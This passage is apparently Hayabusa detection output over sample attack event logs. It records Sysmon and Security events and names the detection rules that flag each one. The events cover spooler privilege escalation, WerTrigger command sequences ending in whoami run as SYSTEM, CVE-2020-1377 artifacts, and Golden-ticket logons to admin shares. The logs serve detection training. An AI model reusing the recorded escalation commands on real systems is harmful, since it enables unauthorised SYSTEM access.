+09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHEM.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.603 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDSCHMX.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.622 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old\1 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\blah\blah\phoneinfo.dll | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:27.949 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Suspicious Print Port | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports\c:\blah\blah\phoneinfo.dll: (Empty) | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SPL | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-E8D1-5F33-0000-001007B63A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.509 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:04:28.521 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\PRINTERS\00002.SHD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:19.719 +09:00,MSEDGEWIN10,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.23,../hayabusa-rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.029 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1740 | PGUID: 747F3D96-E90A-5F33-0000-0010863C0100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3320 | PGUID: 747F3D96-E90C-5F33-0000-0010CB420200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:20.378 +09:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:36.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x41c24 | PID: 5128 | PGUID: 747F3D96-E920-5F33-0000-001043920A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c reg query ""HKLM\Software\WOW6432Node\Npcap"" /ve 2>nul | find ""REG_SZ"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\SYSTEM32\cmd.exe /c """"C:\Program Files\Npcap\CheckStatus.bat"""" | LID: 0x3e7 | PID: 6952 | PGUID: 747F3D96-E922-5F33-0000-00107A2B0B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:38.260 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:05:45.570 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\Explorer.EXE | Tgt Process: C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 5144 | Src PGUID: 747F3D96-E914-5F33-0000-001009990500 | Tgt PID: 7480 | Tgt PGUID: 747F3D96-E928-5F33-0000-0010B8330D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7836 | PGUID: 747F3D96-E938-5F33-0000-00101CA50E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:00.737 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7852 | PGUID: 747F3D96-E939-5F33-0000-0010ACAB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:01.637 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7868 | PGUID: 747F3D96-E93A-5F33-0000-001014B30E00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:02.552 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c schtasks /run /TN ""Microsoft\Windows\Windows Error Reporting\QueueReporting"" > nul 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: WerTrigger.exe | LID: 0x41c24 | PID: 7888 | PGUID: 747F3D96-E93B-5F33-0000-0010C1B40E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,high,,Parent in Public Folder Suspicious Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_public_folder_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:03.487 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:04.075 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wermgr.exe -upload | LID: 0x3e7 | PID: 8032 | PGUID: 747F3D96-E93C-5F33-0000-0010A6F00E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 7460 | PGUID: 747F3D96-E940-5F33-0000-001039310F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,../hayabusa-rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-12 22:06:08.143 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx 2020-08-21 00:35:28.503 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: hack-admu-test1 | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2275e86d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:36:32.382 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:36:32.391 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276a30d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:06.186 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:14.331 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:17.039 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:35.319 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b0af,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:37:35.773 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: JUMP01$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276b890,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-Failed ADMIN$ share access.evtx 2020-08-21 00:38:23.185 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: not_existing_user | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.23.9 | LID: 0x2276d109,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx 2020-08-21 00:39:15.820 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x2276ac17,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5140-ADMIN$ share connection with Golden ticket.evtx 2020-08-21 00:41:58.884 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: not_existing_user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b90e2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a72,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.177 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9a8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9aa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:54.193 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9ab2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:42:55.188 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9b27,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:04.967 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119b9e04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba401,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba414,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-21 00:43:36.582 +09:00,fs02.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x119ba427,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4624-Success login with Golden ticket.evtx 2020-08-25 18:58:51.434 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\{17A6A947-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db | Process: C:\Windows\system32\LogonUI.exe | PID: 8500 | PGUID: 747F3D96-E0DA-5F44-0000-0010B3299600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:02:32.697 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:02:32.701 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.690 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx 2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 